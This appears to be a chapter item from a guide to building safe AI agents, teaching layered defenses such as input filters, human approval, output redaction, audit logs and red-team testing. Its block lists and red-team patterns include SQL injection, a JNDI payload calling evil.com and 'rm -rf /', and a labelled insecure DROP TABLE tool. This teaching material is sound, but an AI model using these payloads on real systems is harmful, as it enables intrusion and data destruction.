Item 31: Design Safety as Layered Defense, Not a Single Check

The Problem

You add a single safety check and assume that is enough:

# Bad: only one layer of checks
class UnsafeAgent:
    def run(self, user_input: str):
        if "delete" in user_input:
            return "Blocked"
        # If this one check is bypassed, everything downstream is exposed
        return self.execute_dangerous_tool(user_input)

Or you have no safety controls at all:

# Dangerous: no safety checks at all
@tool
def delete_database(table_name: str):
    """Drop a database table"""
    # Unvalidated string interpolation: also open to SQL injection
    db.execute(f"DROP TABLE {table_name}")
    return "Deleted"

# Any user input can trigger this tool!

Deep Dive

Safety is not a single check; it is multiple layers of shields

┌────────────────────────────────────────────────────────────────┐
│                     Layered Security Model                      │
├────────────────────────────────────────────────────────────────┤
│                                                                  │
│  User input                                                      │
│      ↓                                                           │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │  Layer 1: Input Validation                               │   │
│  │  - Blocked-keyword filtering                             │   │
│  │  - Injection detection                                   │   │
│  │  - Rate limiting                                         │   │
│  └──────────────────────────────────────────────────────────┘   │
│      ↓                                                           │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │  Layer 2: Tool Approval                                  │   │
│  │  - Human approval for high-risk tools                    │   │
│  │  - Tiered permissions                                    │   │
│  │  - Operation auditing                                    │   │
│  └──────────────────────────────────────────────────────────┘   │
│      ↓                                                           │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │  Layer 3: Output Filtering                               │   │
│  │  - Harmful-content filtering                             │   │
│  │  - Sensitive-data redaction                              │   │
│  │  - Compliance checks                                     │   │
│  └──────────────────────────────────────────────────────────┘   │
│      ↓                                                           │
│  Final response                                                  │
│                                                                  │
└────────────────────────────────────────────────────────────────┘

Mental model: safety works like real-world physical security. An airport runs layered screening (metal detectors, X-ray scanning, identity checks), so defeating a single checkpoint does not defeat the whole system.

Recommended Approach

Layer 1: Input Validation Middleware

import time

from agent_framework import Middleware

class InputSafetyMiddleware(Middleware):
    """Input safety checks"""

    BLOCKED_PATTERNS = [
        "delete",
        "drop table",
        "rm -rf",
        "format:",
        "--",
    ]

    def __init__(self, blocked_patterns: list[str] | None = None):
        self.blocked_patterns = blocked_patterns or self.BLOCKED_PATTERNS

    async def on_input(self, input_data, context):
        """Check input before the agent processes it"""
        text = str(input_data)

        for pattern in self.blocked_patterns:
            if pattern.lower() in text.lower():
                raise ValueError(f"Input contains a blocked pattern: {pattern}")

        return input_data  # passed all checks, continue


class RateLimitMiddleware(Middleware):
    """Rate limiting"""

    def __init__(self, max_requests_per_minute: int = 60):
        self.max_requests = max_requests_per_minute
        self.requests = []

    async def on_input(self, input_data, context):
        now = time.time()
        # Keep only the requests from the last 60 seconds
        self.requests = [t for t in self.requests if now - t < 60]

        if len(self.requests) >= self.max_requests:
            raise ValueError("Too many requests; please try again later")

        self.requests.append(now)
        return input_data

Layer 2: Tool Approval

from agent_framework import Middleware, tool

# High-risk tools require approval
@tool
def delete_database(table_name: str) -> str:
    """Drop a database table (high-risk operation)"""
    # Do not execute directly; return a pending-approval status instead
    return f"DELETE_REQUEST_PENDING: {table_name}"

# Configure tool approval
class HumanApprovalMiddleware(Middleware):
    """Human-approval middleware"""

    def __init__(self, approver):
        self.approver = approver  # e.g. an email or Slack webhook integration

    async def on_tool_call(self, tool_name: str, args: dict, context):
        high_risk_tools = ["delete_database", "send_email", "transfer_money"]

        if tool_name in high_risk_tools:
            # Send the approval request
            approval_id = self.approver.request_approval(
                tool=tool_name,
                args=args,
                user=context.user_id,
            )

            # Wait for the decision (this can be asynchronous)
            if not self.approver.wait_for_approval(approval_id, timeout=300):
                raise ValueError(f"Tool {tool_name}: approval timed out or was rejected")

        return args  # return the args and continue execution

Layer 3: Output Filtering

import re

class OutputSafetyMiddleware(Middleware):
    """Output safety checks"""

    SENSITIVE_PATTERNS = [
        r"\d{15,18}",            # national ID number
        r"\d{16,19}",            # credit card number
        r"sk-[a-zA-Z0-9]{20,}",  # API key
    ]

    def __init__(self, patterns: list[str] | None = None):
        self.patterns = patterns or self.SENSITIVE_PATTERNS

    async def on_output(self, output, context):
        """Check output before it is returned to the user"""
        text = str(output)

        for pattern in self.patterns:
            if re.search(pattern, text):
                # Redact the match
                text = re.sub(pattern, "[REDACTED]", text)

        return text


class ContentFilterMiddleware(Middleware):
    """Content filtering"""

    HARMFUL_KEYWORDS = [
        "how to build a bomb",
        "how to hack someone else's computer",
        # ... more blocked keywords
    ]

    async def on_output(self, output, context):
        text = str(output)

        for keyword in self.HARMFUL_KEYWORDS:
            if keyword in text:
                return "Sorry, I can't help with that."

        return output

A Complete Layered-Safety Agent

# Compose multiple safety layers
agent = Agent(
    client=client,
    instructions="You are a helpful assistant.",
    tools=[delete_database, send_email, calculate],
    middleware=[
        InputSafetyMiddleware(),                          # Layer 1
        RateLimitMiddleware(max_requests_per_minute=60),  # Layer 1
        HumanApprovalMiddleware(approver),                # Layer 2
        OutputSafetyMiddleware(),                         # Layer 3
        ContentFilterMiddleware(),                        # Layer 3
    ],
)
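
A minimal usage sketch, assuming the hypothetical agent_framework surfaces middleware rejections as the ValueError raised in the sketches above:

import asyncio

async def main():
    # A benign request passes through all three layers untouched.
    print(await agent.run("What is 2 + 2?"))

    # A request that trips Layer 1 never reaches the model or any tool.
    try:
        await agent.run("please drop table users")
    except ValueError as exc:
        print(f"Blocked at the input layer: {exc}")

asyncio.run(main())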

Good vs. Bad

# Bad: a single check
@tool
def dangerous_tool(input):
    if "bad" in input:  # one layer, easy to bypass
        return "blocked"
    execute_dangerous_operation(input)

# Good: defense in depth
@tool
def dangerous_tool(input):
    # Layer 1: tool-level check
    if contains_dangerous_pattern(input):
        return "blocked at tool level"
    execute_dangerous_operation(input)

# Layer 2: middleware checks (InputSafetyMiddleware, RateLimitMiddleware)
# Layer 3: approval workflow (HumanApprovalMiddleware)

Further Discussion

Designing the Security Layers

Layer     Mechanism                  Purpose
Layer 0   Basic client validation    API keys, authentication
Layer 1   Input validation           Injection, format, and length checks
Layer 2   Business rules             Permissions, approvals
Layer 3   Output validation          Redaction, filtering
Layer 4   Auditing                   Logging, traceability
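
Layer 0 sits below the agent itself and is not shown elsewhere in this item. A minimal sketch, assuming a hypothetical Client constructor and an LLM_API_KEY environment variable (both names are illustrative):

import os

def build_client():
    """Layer 0: refuse to construct a client without valid credentials."""
    api_key = os.environ.get("LLM_API_KEY")
    if not api_key:
        # Fail-close: no credentials, no client, no agent.
        raise RuntimeError("LLM_API_KEY is not set")
    return Client(api_key=api_key)  # hypothetical Client constructor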

Audit Logging

from datetime import datetime

class AuditLogger:
    """Security audit log"""

    def __init__(self):
        # Replace with a tamper-evident sink (append-only file, database)
        self.audit_log = []

    def log_tool_call(self, tool_name: str, args: dict, user: str, approved: bool):
        entry = {
            "timestamp": datetime.now().isoformat(),
            "event": "tool_call",
            "tool": tool_name,
            "args": args,
            "user": user,
            "approved": approved,
        }
        # Write to a tamper-evident audit log (e.g. an append-only file or database)
        self.audit_log.append(entry)

    def log_input_blocked(self, input_text: str, reason: str, user: str):
        entry = {
            "timestamp": datetime.now().isoformat(),
            "event": "input_blocked",
            "input": input_text[:200],  # record only the first 200 characters
            "reason": reason,
            "user": user,
        }
        self.audit_log.append(entry)

    def log_output_filtered(self, original: str, reason: str):
        entry = {
            "timestamp": datetime.now().isoformat(),
            "event": "output_filtered",
            "original": original[:200],
            "reason": reason,
        }
        self.audit_log.append(entry)
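
The in-memory list above is only a stand-in. A minimal sketch of an append-only sink that writes one JSON object per line; the AppendOnlyAuditLog name and the audit.log path are illustrative:

import json

class AppendOnlyAuditLog:
    """Illustrative append-only sink: one JSON object per line."""

    def __init__(self, path: str = "audit.log"):
        self.path = path

    def append(self, entry: dict) -> None:
        # Mode "a" only ever appends; archive the file to write-once
        # storage (or ship it elsewhere) to keep it tamper-evident.
        with open(self.path, "a", encoding="utf-8") as f:
            f.write(json.dumps(entry, ensure_ascii=False) + "\n")

Because both expose append(), AuditLogger can hold an AppendOnlyAuditLog as self.audit_log without changing any of its call sites.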

Human-in-the-Loop Mechanism

import uuid

import requests

class SlackApprover:
    """Slack-based approval"""

    def __init__(self, webhook_url: str):
        self.webhook_url = webhook_url

    def request_approval(self, tool: str, args: dict, user: str) -> str:
        approval_id = str(uuid.uuid4())

        message = {
            "text": "Tool execution approval request",
            "blocks": [
                {"type": "section", "text": {"type": "mrkdwn", "text": f"*Tool*: {tool}"}},
                {"type": "section", "text": {"type": "mrkdwn", "text": f"*Requested by*: {user}"}},
                {"type": "section", "text": {"type": "mrkdwn", "text": f"*Args*: {args}"}},
                {"type": "actions", "elements": [
                    {"type": "button", "text": {"type": "plain_text", "text": "Approve"}, "action_id": f"approve_{approval_id}"},
                    {"type": "button", "text": {"type": "plain_text", "text": "Reject"}, "action_id": f"reject_{approval_id}"},
                ]},
            ]
        }

        requests.post(self.webhook_url, json=message)
        return approval_id
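
HumanApprovalMiddleware above also calls wait_for_approval, which a one-way webhook cannot answer by itself. A minimal polling sketch, assuming a hypothetical decision store that your Slack interactivity endpoint writes decisions into:

import time

class ApprovalStore:
    """Hypothetical store filled in by your Slack interactivity endpoint."""

    def __init__(self):
        self.decisions: dict[str, bool] = {}  # approval_id -> approved?

    def get(self, approval_id: str) -> bool | None:
        return self.decisions.get(approval_id)


def wait_for_approval(store: ApprovalStore, approval_id: str,
                      timeout: int = 300, poll_interval: float = 2.0) -> bool:
    """Poll for a decision; fail-close (treat as rejected) on timeout."""
    deadline = time.time() + timeout
    while time.time() < deadline:
        decision = store.get(approval_id)
        if decision is not None:
            return decision
        time.sleep(poll_interval)
    return False  # no decision in time -> deny by default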

Red-Team Testing

# Run security tests regularly
class RedTeamTester:
    ATTACK_PATTERNS = [
        "'; DROP TABLE users;--",      # SQL injection
        "${jndi:ldap://evil.com/a}",   # Log4j-style JNDI injection
        "rm -rf /",                    # shell command injection
        # ... more attack patterns
    ]

    async def run_tests(self, agent):
        for pattern in self.ATTACK_PATTERNS:
            try:
                result = await agent.run(pattern)
                if not self.is_safe_response(result):
                    print(f"VULNERABILITY: {pattern} bypassed security")
            except Exception as e:
                print(f"BLOCKED: {pattern} - {e}")

Things to Remember

  • Safety must be layered; a single check is not reliable.
  • Layer 1 (input): filtering, validation, rate limiting.
  • Layer 2 (tools): approval, permissions, isolation.
  • Layer 3 (output): redaction, filtering, compliance.
  • Any layer can fail; the layers must back each other up.
  • High-risk tools require human approval and must never execute automatically.
  • Audit logs exist for after-the-fact analysis and must be tamper-proof.
  • Never trust user input, even input that has passed earlier checks.
  • Failure policy: when a safety check itself fails, fail-close (deny by default) rather than fail-open (allow by default); see the sketch after this list.
  • Human-in-the-loop review is the highest-authority safety shield.
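
A minimal sketch of the fail-close policy, wrapping any of the middleware sketches above so that an error inside the check itself counts as a rejection rather than a pass (the middleware shape follows this item's earlier sketches, not a specific framework API):

class FailCloseMiddleware(Middleware):
    """Treat a broken safety check as a denial, never as a pass."""

    def __init__(self, inner: Middleware):
        self.inner = inner

    async def on_input(self, input_data, context):
        try:
            return await self.inner.on_input(input_data, context)
        except ValueError:
            raise  # an explicit block stays a block
        except Exception as exc:
            # The check itself failed (timeout, bad regex, dead service):
            # deny by default instead of silently letting the input through.
            raise ValueError(f"Safety check unavailable, request denied: {exc}")

Wrapping InputSafetyMiddleware in FailCloseMiddleware makes an outage in the filter look, from the caller's side, like a blocked request rather than a free pass.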